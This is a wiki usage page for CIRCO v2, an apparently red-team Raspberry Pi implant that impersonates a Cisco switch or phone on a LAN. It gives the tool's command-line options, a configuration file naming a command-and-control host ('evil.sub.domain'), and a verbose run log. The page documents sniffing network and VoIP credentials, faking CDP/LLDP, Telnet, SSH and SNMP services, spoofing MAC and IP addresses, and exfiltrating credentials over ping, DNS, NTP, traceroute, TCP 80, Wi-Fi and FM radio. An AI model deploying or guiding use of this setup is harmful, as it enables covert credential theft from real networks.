Skip to content

CIRCO Usage

Jump to bottom
Emilio edited this page Aug 7, 2020 · 3 revisions

CIRCO v2 Usage

Help

(venv) root@circov2020:/home/pi-enc/v2020# ./circo.py
  ____ ___ ____   ____ ___
 / ___|_ _|  _ \ / ___/ _ \
| |    | || |_) | |  | | | |
| |___ | ||  _ <| |__| |_| |
 \____|___|_| \_\\____\___/


Author: Emilio / @ekio_jp
Version: 2.020

usage: circo.py [-h] [-v] (-i <eth0> | -b) [-A] [-p] [-t] [-d] [-x] [-n] [-f]
                [-w <wlan1>] [--tcp 80] [--spoof] [--voip] [-l <logfile>]

optional arguments:
  -h, --help     show this help message and exit
  -v, --verbose  Enable debugging
  -i <eth0>      Single Mode: <eth0>
  -b, --bridge   Bridge Mode: Use eth0 & eth1
  -A, --ALL      All exfiltration
  -p, --ping     PING exfiltration
  -t, --trace    Traceroute exfiltration
  -d, --dns      DNS exfiltration
  -x, --prx      Proxy exfiltration
  -n, --ntp      NTP exfiltration
  -f, --fm       FM DRS exfiltration
  -w <wlan1>     Wireles exfiltration
  --tcp 80       TCP exfiltration
  --spoof        Spoofing MAC/IP (Proxy Excluded)
  --voip         Collect RTP and SIP credentials
  -l <logfile>   Log File (default <timestamp>.log
(venv) root@circov2020:/home/pi-enc/v2020#

Using -v will print out the program flow and also when credentials been sent out The -i eth0 (single mode) or -b (bridge mode) are mandatory, we need a LAN NIC to be a Phone/Switch (single mode) or 2 LAN NIC (eth0 to switch) and (eth1 to phone). Extraction modes are optional, you can combine multiple or -A Note -a wlan1 need a wireless NIC adaptor capable of packet injection, I found using the onbord Raspberry PI wireless is unstable so I opt for a USB wireless dongle (RT3080/RT3070) work out-of-the-box with Raspbian --spoof will pickup a MAC/IP from eth1 and use those for exfiltration --voip will capture RTP and SIP pcap's in Captures directory -l log credentials to a file

Configuration file is called .env below format

PHRASE='Waaaaa! awesome :)'
SALT='salgruesa'
SEED1=1000
SEED2=5000
SEED3=8000
MAGIC=666
WIFICHAN=10
SWMAC='00:07:B4:00:FA:DE'
INT='FastEthernet0/3'
PHONEMAC='10:8C:CF:75:BB:AA'
SERIAL='FCW1831C1AA'
SNPSU='LIT18300QBB'
SNMPC='public'
CCHOST='200.200.200.300'
CCNAME='evil.sub.domain'
DIRNAME='/home/pi-enc/v2020/'
SSIDROOT='nec-c17c02'
SSIDALARM='pacman'
WIFIMAC='98:f1:99:c1:7c:02'
SNMPTPL='snmpwalk.mib'
TYPE='switch'
FM='87.6'

Running Examples

Using verbose mode (-v), bridge (-b) and all exfiltration methods (TCP port 80 and wlan1)

venv) root@circov2020:/home/pi-enc/v2020# ./circo.py -v -b -p -t -n -d -x -f --tcp 80 -w wlan1 -l creds.txt
  ____ ___ ____   ____ ___
 / ___|_ _|  _ \ / ___/ _ \
| |    | || |_) | |  | | | |
| |___ | ||  _ <| |__| |_| |
 \____|___|_| \_\\____\___/


Author: Emilio / @ekio_jp
Version: 2.020

DEBUG:CDP/LLDP peer discovery
DEBUG:Change MAC to fake switch: 00:07:B4:00:FA:DE
DEBUG:DHCP request started
DEBUG:Configure br0 interface
DEBUG:Collect gateway ARP
DEBUG:Starting Proxy Discovery
DEBUG:Found PAC via DHCP: http://10.10.10.1:88/proxy.pac
DEBUG:Starting Net-Creds Sniffer
DEBUG:SNMP fake template created
DEBUG:Starting CDP as switch
DEBUG:Starting LLDP as switch
DEBUG:Starting IOS Telnet
DEBUG:Starting IOS SSH
DEBUG:Starting IOS SNMP
DEBUG:Starting NMAP OS Fooler
DEBUG:Start WIFI wlan1 monitor mode in channel 10
DEBUG:Starting Exfiltration WIFI
DEBUG:Starting Exfiltration PING
DEBUG:Starting Exfiltracion Traceroute
DEBUG:Starting Exfiltracion TCP 80
DEBUG:Starting Exfiltracion NTP
DEBUG:Starting Exfiltracion DNS
DEBUG:Starting Exfiltracion Proxy DNS
DEBUG:Starting Exfiltracion FM
DEBUG:Sending credentials via PING
DEBUG:Sending credentials via Wifi
DEBUG:Sending credentials via NTP
DEBUG:Sending credentials via DNS
DEBUG:Sending credentials via TRACE
DEBUG:Sending credentials via Proxy DNS
DEBUG:Sending credentials via FM 87.6
DEBUG:Sending credentials via TCP 80
Clone this wiki locally